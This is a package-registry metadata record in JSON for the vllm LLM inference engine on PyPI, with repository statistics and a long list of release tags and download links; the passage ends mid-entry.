{"id":7891556,"name":"vllm","ecosystem":"pypi","description":"A high-throughput and memory-efficient inference and serving engine for LLMs","homepage":"https://github.com/vllm-project/vllm","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/vllm-project/vllm","keywords_array":[],"namespace":null,"versions_count":98,"first_release_published_at":"2023-06-19T08:21:42.000Z","latest_release_published_at":"2026-09-22T05:22:21.000Z","latest_release_number":"0.30.0","last_synced_at":"2026-10-03T10:17:17.231Z","created_at":"2023-07-05T05:07:05.916Z","updated_at":"2026-10-04T01:15:36.183Z","registry_url":"https://pypi.org/project/vllm/","install_command":"pip install vllm --index-url https://pypi.org/simple","documentation_url":"https://docs.vllm.ai/en/latest/","metadata":{"funding":null,"documentation":"https://docs.vllm.ai/en/latest/","classifiers":["Intended Audience :: Developers","Intended Audience :: Information Technology","Intended Audience :: Science/Research","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.14","Topic :: Scientific/Engineering :: Artificial Intelligence","Topic :: Scientific/Engineering :: Information Analysis"],"normalized_name":"vllm","project_status":null},"repo_metadata":{"id":176349946,"uuid":"599547518","full_name":"vllm-project/vllm","owner":"vllm-project","description":"A high-throughput and memory-efficient inference and serving engine for LLMs","archived":false,"fork":false,"pushed_at":"2026-09-30T15:32:01.000Z","size":307421,"stargazers_count":92986,"open_issues_count":8395,"forks_count":22851,"subscribers_count":598,"default_branch":"main","last_synced_at":"2026-09-30T15:32:05.813Z","etag":null,"topics":["amd","blackwell","cuda","deepseek","deepseek-v3","gpt","gpt-oss","inference","kimi","llama","llm","llm-serving","model-serving","moe","openai","pytorch","qwen","qwen3","tpu","transformer"],"latest_commit_sha":null,"homepage":"https://vllm.ai","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vllm-project.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":".github/CODEOWNERS","security":"SECURITY.md","support":null,"governance":"docs/governance/collaboration.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":"DCO","cla":null,"disclosure":null},"funding":{"github":["vllm-project"],"open_collective":"vllm"}},"created_at":"2023-02-09T11:23:20.000Z","updated_at":"2026-09-30T15:19:01.000Z","dependencies_parsed_at":"2026-09-30T15:03:53.334Z","dependency_job_id":"1accb896-3ef2-49a6-b6ae-169b956eab12","html_url":"https://github.com/vllm-project/vllm","commit_stats":{"total_commits":4106,"total_committers":701,"mean_commits":5.85734664764622,"dds":0.8816366293229421,"last_synced_commit":"7a3a83e3b87f50fe9c0985a5c5bcc1d4cf2e95cd"},"previous_names":["vllm-project/vllm"],"tags_count":201,"template":false,"template_full_name":null,"purl":"pkg:github/vllm-project/vllm","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vllm-project","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":342085742,"owners_count":37879961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-30T02:00:06.001Z","response_time":133,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"vllm-project","name":"vLLM","uuid":"136984999","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/136984999?v=4","repositories_count":50,"last_synced_at":"2026-09-25T10:35:00.651Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/vllm-project","funding_links":["https://github.com/sponsors/vllm-project"],"total_stars":128437,"followers":4233,"following":0,"created_at":"2023-06-25T19:45:51.949Z","updated_at":"2026-09-25T10:35:00.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vllm-project","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vllm-project/repositories"},"tags":[{"name":"proto-v0.4.0","sha":"f28a5081629377c36cd219a35070555b72279109","kind":"tag","published_at":"2026-09-30T12:52:24.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/proto-v0.4.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/proto-v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@proto-v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.4.0/manifests"},{"name":"v0.31.0rc2","sha":"7a7283a0a25cd44fef4c7f326ad8a65f1244fd96","kind":"commit","published_at":"2026-09-30T00:33:58.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.31.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.31.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.31.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.31.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.31.0rc2/manifests"},{"name":"v0.31.0rc1","sha":"ee09ef4a60bcf8bba3d8cd2e32e584a460c0c459","kind":"commit","published_at":"2026-09-29T03:18:39.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.31.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.31.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.31.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.31.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.31.0rc1/manifests"},{"name":"v0.30.1rc0","sha":"153242a314153637999eb6ebe8dd830e63433bb6","kind":"commit","published_at":"2026-09-23T08:06:15.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.30.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.30.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.30.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.1rc0/manifests"},{"name":"v0.30.0","sha":"ced6857afa0ea7b2e3f0846a62e1394e90f15607","kind":"commit","published_at":"2026-09-21T22:32:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.30.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.0/manifests"},{"name":"v0.30.0rc2","sha":"fa6ff060667f2cd96f142af021ba9e35165beb78","kind":"commit","published_at":"2026-09-18T21:15:44.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.30.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.30.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.30.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.0rc2/manifests"},{"name":"v0.30.0rc1","sha":"a00a3544b93edbd66c8eda7285e4468f1202dc4b","kind":"commit","published_at":"2026-09-17T10:37:53.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.30.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.30.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.30.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.30.0rc1/manifests"},{"name":"proto-v0.3.0","sha":"d2a2a82954e4151cbf398c6c9c46ea7b037b0915","kind":"tag","published_at":"2026-09-17T03:47:02.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/proto-v0.3.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/proto-v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@proto-v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.3.0/manifests"},{"name":"proto-v0.2.0","sha":"f37c550bf6353d7d2a7289cbf256943e8c282fad","kind":"tag","published_at":"2026-09-16T08:32:41.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/proto-v0.2.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/proto-v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@proto-v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.2.0/manifests"},{"name":"v0.29.1rc0","sha":"7ee8a6dd013819838da8012ca549d724bee7c6c6","kind":"commit","published_at":"2026-09-12T18:42:01.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.1rc0/manifests"},{"name":"proto-v0.1.0","sha":"69db1c26b4fe4474ab4c9df1c9701efac8bedde1","kind":"tag","published_at":"2026-09-11T08:30:05.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/proto-v0.1.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/proto-v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@proto-v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/proto-v0.1.0/manifests"},{"name":"v0.29.0","sha":"98dff2a81d747d1dba01a47f939f48c3526d4206","kind":"commit","published_at":"2026-09-08T08:50:34.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0/manifests"},{"name":"v0.29.0rc6","sha":"74c96922ecb9017f413318c76d1af83aa2ab45a5","kind":"commit","published_at":"2026-09-08T08:34:20.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.0rc6","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.0rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.0rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc6/manifests"},{"name":"v0.29.0rc5","sha":"0c766af7fd06931349a6260c3ea3609ef8cfb76a","kind":"commit","published_at":"2026-09-08T08:20:33.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.0rc5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.0rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.0rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc5/manifests"},{"name":"v0.29.0rc4","sha":"d2906cc1958658f296aeee8b248deea684f56add","kind":"commit","published_at":"2026-09-04T22:58:29.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.0rc4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.0rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.0rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc4/manifests"},{"name":"v0.29.0rc3","sha":"4cf572b6e9ac95143a560e74cb72df49b528f6af","kind":"commit","published_at":"2026-09-04T00:52:54.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc3/manifests"},{"name":"v0.29.0rc2","sha":"586f1d6d2da011744e1bae26c8686dc206bf648c","kind":"commit","published_at":"2026-09-03T09:41:12.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc2/manifests"},{"name":"v0.29.0rc1","sha":"33898f832c53c3e98999e0ec2c689f61ee92a9bc","kind":"commit","published_at":"2026-09-02T02:11:30.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.29.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.29.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.29.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.29.0rc1/manifests"},{"name":"v0.28.1rc0","sha":"79651d6085885cf2842baf85526ece7afa87c87d","kind":"commit","published_at":"2026-08-27T06:58:23.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.28.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.28.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.28.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.1rc0/manifests"},{"name":"v0.28.0","sha":"2cf0a6915ce544dc493a0990f2ea38d81601128a","kind":"commit","published_at":"2026-08-24T23:42:42.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.28.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.0/manifests"},{"name":"v0.28.0rc2","sha":"74a6576b9b5832494c314405c3cae94db55801e1","kind":"commit","published_at":"2026-08-21T06:47:39.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.28.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.28.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.28.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.0rc2/manifests"},{"name":"v0.28.0rc1","sha":"cd6ae1e0a08845eb4e186ca7fdbb25cfc7008014","kind":"commit","published_at":"2026-08-20T09:30:39.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.28.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.28.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.28.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.28.0rc1/manifests"},{"name":"v0.27.1","sha":"6e448d0ea9bf3d88d898b65449ca6dc2aec170ac","kind":"commit","published_at":"2026-08-11T08:12:11.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.27.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.1/manifests"},{"name":"v0.27.0","sha":"4bdc8a788d2e2ce9165d552b3d4d8b72604626bf","kind":"commit","published_at":"2026-08-10T10:48:34.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.27.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.0/manifests"},{"name":"v0.27.0rc2","sha":"4dbf890219428c4682691cacbf97365f18c27c37","kind":"tag","published_at":"2026-08-09T09:57:05.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.27.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.27.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.27.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.0rc2/manifests"},{"name":"v0.27.0rc1","sha":"4b25076c818659a40cc213227b52e0b71b5e7021","kind":"tag","published_at":"2026-08-07T00:36:54.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.27.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.27.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.27.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.27.0rc1/manifests"},{"name":"v0.26.1rc0","sha":"53f6dd5c6f7725df4e5ac9441569860023100870","kind":"commit","published_at":"2026-07-27T21:47:07.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.26.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.26.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.26.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.26.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.26.1rc0/manifests"},{"name":"v0.26.0","sha":"568afb3a13806beb53bb2e6bd518269357b237c0","kind":"commit","published_at":"2026-07-27T00:57:50.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.26.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.26.0/manifests"},{"name":"v0.26.0rc1","sha":"e5949f10009c8b1803e2e37f5610b4dd047d432f","kind":"tag","published_at":"2026-07-23T18:55:37.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.26.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.26.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.26.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.26.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.26.0rc1/manifests"},{"name":"v0.25.1","sha":"752a3a504485790a2e8491cacbb35c137339ad34","kind":"commit","published_at":"2026-07-12T23:40:12.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.25.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.1/manifests"},{"name":"v0.25.0","sha":"702f4814fe54fabff350d43cb753ae3e47c0c276","kind":"commit","published_at":"2026-07-11T10:25:04.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.25.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0/manifests"},{"name":"v0.25.0rc3","sha":"3d1c21a6fc2681a141ac920599b1cb91a5c54381","kind":"commit","published_at":"2026-07-09T10:24:39.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.25.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.25.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.25.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0rc3/manifests"},{"name":"v0.25.0rc2","sha":"8bbc0062b155da7f4a651b1885003708bbe6aaea","kind":"commit","published_at":"2026-07-09T04:12:19.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.25.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.25.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.25.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0rc2/manifests"},{"name":"v0.25.0rc1","sha":"b2dec4ac5a7942fdac7e687175bebba2f1d43575","kind":"commit","published_at":"2026-07-08T01:20:30.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.25.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.25.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.25.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.25.0rc1/manifests"},{"name":"v0.24.0","sha":"ee0da84ab9e04ac7610e28580af62c365e898389","kind":"commit","published_at":"2026-06-28T07:04:08.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.24.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.24.0/manifests"},{"name":"v0.24.0rc2","sha":"6d37570a1c6d8f96e9f2b2b72594ab9fd3ae0993","kind":"commit","published_at":"2026-06-25T20:15:20.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.24.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.24.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.24.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.24.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.24.0rc2/manifests"},{"name":"v0.24.0rc1","sha":"7b3d595eb197d714052ce296cc8b124f0dc8af31","kind":"commit","published_at":"2026-06-24T08:01:53.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.24.0rc1",